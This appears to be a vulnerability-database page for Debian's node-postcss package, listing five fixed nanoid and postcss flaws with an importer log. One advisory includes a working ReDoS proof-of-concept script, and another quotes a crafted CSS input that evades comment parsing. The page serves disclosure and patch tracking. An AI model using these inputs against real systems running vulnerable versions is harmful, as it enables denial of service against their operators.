Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1?distro=trixie
purl pkg:deb/debian/node-postcss@8.4.20%2B~cs8.0.23-1%2Bdeb12u1?distro=trixie
Vulnerabilities affecting this package (0)
Vulnerability Summary Fixed by
This package is not known to be affected by vulnerabilities.
Vulnerabilities fixed by this package (5)
Vulnerability Summary Aliases
VCID-7cky-3c29-zyar Exposure of Sensitive Information to an Unauthorized Actor in nanoid The package nanoid from 3.0.0, before 3.1.31, are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated. CVE-2021-23566
GHSA-qrpm-p2h7-hrv2
VCID-9w43-n9cx-k7ab Regular Expression Denial of Service in postcss The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing. CVE-2021-23368
GHSA-hwj9-h5mp-3pm3
VCID-f8u5-8mj5-7yc6 PostCSS line return parsing error An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\r` discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule. This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment. CVE-2023-44270
GHSA-7fh5-64p2-3v2j
VCID-s6f3-3mxh-ekfr Predictable results in nanoid generation when given non-integer values When nanoid is called with a fractional value, there were a number of undesirable effects: 1. in browser and non-secure, the code infinite loops on while (size--) 2. in node, the value of poolOffset becomes fractional, causing calls to nanoid to return zeroes until the pool is next filled 3. if the first call in node is a fractional argument, the initial buffer allocation fails with an error Version 3.3.8 and 5.0.9 are fixed. CVE-2024-55565
GHSA-mwcw-c2x4-8c55
VCID-scy5-ccf9-dygp Regular Expression Denial of Service in postcss The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern ```regex \/\*\s* sourceMappingURL=(.*) ``` ### PoC ```js var postcss = require("postcss") function build_attack(n) { var ret = "a{}" for (var i = 0; i < n; i++) { ret += "/*# sourceMappingURL=" } return ret + "!"; } ``` ```js postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) try { postcss.parse(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } catch (e) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } } } ``` CVE-2021-23382
GHSA-566m-qj78-rww5

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-16T11:36:02.108142+00:00 Debian Importer Fixing VCID-scy5-ccf9-dygp https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T11:30:46.541187+00:00 Debian Importer Fixing VCID-9w43-n9cx-k7ab https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T10:40:51.483806+00:00 Debian Importer Fixing VCID-s6f3-3mxh-ekfr https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:42:35.234483+00:00 Debian Importer Fixing VCID-f8u5-8mj5-7yc6 https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-16T09:18:29.104248+00:00 Debian Importer Fixing VCID-7cky-3c29-zyar https://security-tracker.debian.org/tracker/data/json 38.4.0
2026-04-12T18:14:44.289196+00:00 Debian Importer Fixing VCID-s6f3-3mxh-ekfr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-12T18:14:44.220824+00:00 Debian Importer Fixing VCID-f8u5-8mj5-7yc6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-12T18:14:44.107836+00:00 Debian Importer Fixing VCID-scy5-ccf9-dygp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-12T18:14:44.057169+00:00 Debian Importer Fixing VCID-9w43-n9cx-k7ab https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T18:16:01.683193+00:00 Debian Importer Fixing VCID-7cky-3c29-zyar https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-03T07:47:14.008053+00:00 Debian Importer Fixing VCID-s6f3-3mxh-ekfr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:47:13.948619+00:00 Debian Importer Fixing VCID-f8u5-8mj5-7yc6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:47:13.895470+00:00 Debian Importer Fixing VCID-7cky-3c29-zyar https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:47:13.852488+00:00 Debian Importer Fixing VCID-scy5-ccf9-dygp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:47:13.807562+00:00 Debian Importer Fixing VCID-9w43-n9cx-k7ab https://security-tracker.debian.org/tracker/data/json 38.1.0